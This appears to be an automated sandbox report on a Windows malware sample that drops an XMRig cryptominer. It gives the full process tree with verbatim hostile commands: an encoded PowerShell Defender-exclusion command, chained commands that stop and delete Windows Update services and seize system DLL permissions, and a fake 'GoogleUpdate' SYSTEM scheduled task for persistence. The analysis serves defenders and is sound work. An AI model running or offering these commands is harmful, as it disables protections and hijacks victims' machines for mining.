Analysis

  • max time kernel
    300s
  • max time network
    298s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    02-07-2022 22:15

General

  • Target

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe

  • Size

    7.5MB

  • MD5

    a29f3494661a52e3c66a2908389c5010

  • SHA1

    1645351e4b00a678ad7c4ac7784bf8d9c8703297

  • SHA256

    be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266

  • SHA512

    1b1314867540a94f60a7075c9021981ede269fda29411eba9b9ed33790010c0f836235c27938eccb5d592cb552d283cdf39ddaf9d28ab3d4d252ba82ada8e25e

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 10 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe
    "C:\Users\Admin\AppData\Local\Temp\be9b68f7a86482bc6d22c05724b671ddeb8fd12f764ea7ed34087ac04b253266.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2324
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:4584
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1804
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3788
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3708
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4908
          • C:\Windows\system32\sc.exe
            sc stop UsoSvc
            5⤵
            • Launches sc.exe
            PID:4944
          • C:\Windows\system32\sc.exe
            sc stop WaaSMedicSvc
            5⤵
            • Launches sc.exe
            PID:1780
          • C:\Windows\system32\sc.exe
            sc stop wuauserv
            5⤵
            • Launches sc.exe
            PID:4764
          • C:\Windows\system32\sc.exe
            sc stop bits
            5⤵
            • Launches sc.exe
            PID:624
          • C:\Windows\system32\sc.exe
            sc stop dosvc
            5⤵
            • Launches sc.exe
            PID:460
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
            5⤵
            • Modifies registry key
            PID:4372
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
            5⤵
            • Modifies registry key
            PID:4796
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
            5⤵
            • Modifies security service
            • Modifies registry key
            PID:1664
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
            5⤵
            • Modifies registry key
            PID:1880
          • C:\Windows\system32\reg.exe
            reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
            5⤵
            • Modifies registry key
            PID:1584
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32\WaaSMedicSvc.dll
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:4864
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            5⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:2660
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:3772
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:1488
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4320
          • C:\Windows\system32\reg.exe
            reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
            5⤵
            • Modifies registry key
            PID:4572
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
            5⤵
              PID:4636
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
              5⤵
                PID:4784
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                5⤵
                  PID:2860
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                  5⤵
                    PID:4800
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                    5⤵
                      PID:2324
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                      5⤵
                        PID:4872
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                        5⤵
                          PID:2140
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4732
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4940
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2964
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-ac 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2516
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          5⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5068
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
                        4⤵
                          PID:4704
                          • C:\Windows\system32\schtasks.exe
                            schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
                            5⤵
                            • Creates scheduled task(s)
                            PID:1924
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
                          4⤵
                            PID:4340
                            • C:\Windows\system32\schtasks.exe
                              schtasks /run /tn "GoogleUpdateTaskMachineQC"
                              5⤵
                                PID:3708
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
                          2⤵
                          • Drops startup file
                          PID:4232
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
                          2⤵
                          • Checks computer location settings
                          PID:4796
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:732
                      • C:\Windows\system32\browser_broker.exe
                        C:\Windows\system32\browser_broker.exe -Embedding
                        1⤵
                        • Modifies Internet Explorer settings
                        PID:3696
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:3232
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies Internet Explorer settings
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4532
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2648
                      • C:\Program Files\Chrome\updater.exe
                        "C:\Program Files\Chrome\updater.exe"
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Executes dropped EXE
                        • Checks BIOS information in registry
                        • Checks whether UAC is enabled
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:4264
                        • C:\Windows\System32\conhost.exe
                          "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
                          2⤵
                          • Drops file in Drivers directory
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Drops file in Program Files directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4916
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                            3⤵
                              PID:3928
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -EncodedCommand "PAAjAGMAYgB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAZwBsACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAegBsACMAPgA="
                                4⤵
                                • Drops file in System32 directory
                                • Modifies data under HKEY_USERS
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3060
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              3⤵
                                PID:4616
                                • C:\Windows\system32\sc.exe
                                  sc stop UsoSvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:1636
                                • C:\Windows\system32\sc.exe
                                  sc stop WaaSMedicSvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:1584
                                • C:\Windows\system32\sc.exe
                                  sc stop wuauserv
                                  4⤵
                                  • Launches sc.exe
                                  PID:2300
                                • C:\Windows\system32\sc.exe
                                  sc stop bits
                                  4⤵
                                  • Launches sc.exe
                                  PID:2168
                                • C:\Windows\system32\sc.exe
                                  sc stop dosvc
                                  4⤵
                                  • Launches sc.exe
                                  PID:1488
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:4292
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:1412
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                  4⤵
                                  • Modifies registry key
                                  PID:2984
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                  4⤵
                                  • Modifies registry key
                                  PID:2416
                                • C:\Windows\system32\reg.exe
                                  reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                  4⤵
                                  • Modifies registry key
                                  PID:1356
                                • C:\Windows\system32\takeown.exe
                                  takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:4344
                                • C:\Windows\system32\icacls.exe
                                  icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                                  4⤵
                                  • Possible privilege escalation attempt
                                  • Modifies file permissions
                                  PID:4872
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:3708
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:3508
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:3024
                                • C:\Windows\system32\reg.exe
                                  reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                  4⤵
                                  • Modifies registry key
                                  PID:3828
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                  4⤵
                                    PID:2844
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    4⤵
                                      PID:4412
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                      4⤵
                                        PID:944
                                      • C:\Windows\system32\schtasks.exe
                                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                        4⤵
                                          PID:3004
                                        • C:\Windows\system32\schtasks.exe
                                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                                          4⤵
                                            PID:60
                                          • C:\Windows\system32\schtasks.exe
                                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                            4⤵
                                              PID:4332
                                            • C:\Windows\system32\schtasks.exe
                                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                                              4⤵
                                                PID:2924
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                              3⤵
                                                PID:4912
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2228
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -hibernate-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:412
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-ac 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2660
                                                • C:\Windows\system32\powercfg.exe
                                                  powercfg /x -standby-timeout-dc 0
                                                  4⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2184
                                              • C:\Windows\System32\conhost.exe
                                                C:\Windows\System32\conhost.exe
                                                3⤵
                                                  PID:3172
                                                  • C:\Windows\System32\conhost.exe
                                                    "C:\Windows\System32\conhost.exe" "adjdyakvdkolri"
                                                    4⤵
                                                      PID:1880
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe zhcixymdmjms1 aL9rWj13blqq3tQ6pq9BT64AEBTmmOZm2QnBzGRIrKyPM+h6GrlnTiw+84eQ+CjWwBvkP87y7fXUxvpWV+HOpwb4PFo0jfTYPIt8JLgpwB1l8+CPbjc8h5MGxwyuTAey5biMSNMXOCtrSwCAFGci43+J3ydPNcojjZuAczbPZ1dBIQ5NqMMQgtC0jINPHoADVgFiGvBTZc3nZKTrcuq8D5Q6HIf/EjJVDZjRZCe1iTbxWAKxZYSidMYzSzljVILede0zBXD0QgA8LeNhccfrjoe1LDMwWWGAFofnDuXZvQ3zrdnSD+cO2tUeQFc0Iw9P0SaQPBUTVX71xc7K3LubObahCWMZVHkFICc50uU8YhqdqKLvSuv0ElS+058KBhG7RyHoxTloFDhNM+dRe4uyDTloLV41p4EJnfF4X9pUtMZNFP5RMoJ0pPwpeeM2damF
                                                    3⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4232
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:4808
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:5012

                                              Network

                                              MITRE ATT&CK Matrix ATT&CK v6

                                              Execution

                                              Scheduled Task

                                              1
                                              T1053

                                              Persistence

                                              Modify Existing Service

                                              2
                                              T1031

                                              Scheduled Task

                                              1
                                              T1053

                                              Privilege Escalation

                                              Scheduled Task

                                              1
                                              T1053

                                              Defense Evasion

                                              Modify Registry

                                              3
                                              T1112

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              Impair Defenses

                                              1
                                              T1562

                                              File Permissions Modification

                                              1
                                              T1222

                                              Discovery

                                              Query Registry

                                              3
                                              T1012

                                              Virtualization/Sandbox Evasion

                                              1
                                              T1497

                                              System Information Discovery

                                              4
                                              T1082

                                              Impact

                                              Service Stop

                                              1
                                              T1489

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Program Files\Chrome\updater.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Windows\Temp\lol.bat
                                                Filesize

                                                59B

                                                MD5

                                                f580e0e80cc87b25e38ea2c0c8059d04

                                                SHA1

                                                299f51dca9c609d6da86f93c424e39c1e6ba0d94

                                                SHA256

                                                9e7b9ed63bd5dfe290fda58104cd98e8d23ba671d3ccb77e82e8b0f7812fb734

                                                SHA512

                                                5a0a1e4d3800ee76fc4d1d102ffe7e0d4e646c08f57f20c019741c3779ca85dc8a1240c77c90b0caef498859de960e71be3a81497b5ffac8b381aa2c7813e83d

                                              • C:\Windows\Temp\run.bat
                                                Filesize

                                                98B

                                                MD5

                                                731afe244b2414169a5f630d52646e56

                                                SHA1

                                                e3771ccdccd8c306ee5fc4f264cfc3310690458c

                                                SHA256

                                                6c24e5b6a9aaced68f9f93581913bdea4cc1077060827d5d59d6680859e4e552

                                                SHA512

                                                84e0dc44ae3eadf6d31484119294126f5a056add94733fea2ba5597b6a302fc107117f5c5029d4ce0ff8e5c859c4de9c456aa5f01d420f25a3d56dc569801ff1

